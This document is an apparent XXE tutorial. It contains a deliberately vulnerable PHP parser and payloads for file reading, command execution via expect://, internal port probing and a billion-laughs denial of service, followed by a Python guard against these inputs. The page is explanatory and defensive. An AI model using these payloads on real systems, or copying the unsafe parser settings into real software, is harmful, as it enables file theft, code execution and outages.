XXE
Extensible Markup Language (XML) is a markup language derived by simplifying and modifying the Standard Generalized Markup Language (SGML). The specifications most commonly used alongside it are XML itself, Extensible Stylesheet Language (XSL), XBRL and XPath.
XML is designed to transmit and store data, so its focus is the content of the data. HTML is designed to display data, so its focus is the appearance of the data.
When the application allows external XML documents (external entities) to be referenced, an attacker can craft an XML document with malicious content to achieve file reading, command execution, port scanning, DDoS and other attacks.
In PHP, set libxml_disable_entity_loader to true to forbid loading external XML documents.
PHP source
<?php
// Deliberately vulnerable demo: external entity loading is explicitly left enabled
libxml_disable_entity_loader(false);
// The raw request body is parsed as XML
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entity references; LIBXML_DTDLOAD loads the DTD
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo $creds;
?>
Payload
-----------------------Arbitrary file read-----------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource= 目标文件的绝对路径 " > ]>
<abc>&xxe;</abc>
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "file:///目标文件的绝对路径" > ]>
<abc>&xxe;</abc>
------------------------Command execution--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "expect://系统命令 " > ]>
<abc>&xxe;</abc>
------------------------Port probing--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]>
<abc>&xxe;</abc>
-------------------------DDOS----------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<abc>&lol9;</abc>
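Every payload above relies on a DTD: the file-read, command-execution and port-probing ones declare an external (SYSTEM) entity, and the DDOS one declares internal entities that expand geometrically. The following Python pre-parse guard, added here as an example and not taken from the page, rejects both classes before the document reaches the real parser; the regexes, the 10,000-character expansion limit, the depth limit and the function names are this example's own choices, and billion_laughs() builds a constructed sample with the same shape as the page's DDOS payload.

```python
import re

# Constructed pre-parse guard (added example, not the page's code); names and limits are its own choices.
EXTERNAL_ENTITY = re.compile(r'<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b')
INTERNAL_ENTITY = re.compile(r'<!ENTITY\s+(\w+)\s+(?:"([^"]*)"|\'([^\']*)\')')
ENTITY_REF = re.compile(r'&(\w+);')
MAX_EXPANSION = 10_000  # chars one entity may expand to; tune per application

def expansion_size(name, entities, cache, depth=0):
    """Characters produced by fully expanding entity `name` (memoised)."""
    if depth > 32:  # recursive declarations such as a -> b -> a never terminate
        raise ValueError("entity nesting too deep")
    if name not in cache:
        value, total, pos = entities[name], 0, 0
        for m in ENTITY_REF.finditer(value):
            total += m.start() - pos  # literal text before the reference
            ref = m.group(1)
            if ref in entities:  # declared entity: expand recursively
                total += expansion_size(ref, entities, cache, depth + 1)
            else:  # &amp; and friends count as written
                total += len(m.group(0))
            pos = m.end()
        cache[name] = total + len(value) - pos
    return cache[name]

def check_xml(doc):
    """Return (accepted, reason) for an untrusted XML document, before parsing."""
    if "<!DOCTYPE" not in doc:
        return True, "no DTD"
    if EXTERNAL_ENTITY.search(doc):  # file://, php://, expect://, http:// all land here
        return False, "external entity declared"
    entities = {n: dq or sq for n, dq, sq in INTERNAL_ENTITY.findall(doc)}
    cache = {}
    for name in entities:
        try:
            size = expansion_size(name, entities, cache)
        except ValueError as err:
            return False, str(err)
        if size > MAX_EXPANSION:
            return False, f"entity {name} expands to {size} chars"
    return True, "internal DTD within limits"

def billion_laughs(levels=9, fanout=10):
    """Constructed sample with the same shape as the page's DDOS payload."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, levels + 1):
        refs = ("&lol;" if i == 1 else f"&lol{i - 1};") * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return "<!DOCTYPE abc [\n" + "\n".join(decls) + f"\n]>\n<abc>&lol{levels};</abc>"
```

The guard only screens input; the parser itself must still run with external entity loading disabled and without LIBXML_NOENT, otherwise anything the regexes miss is expanded anyway.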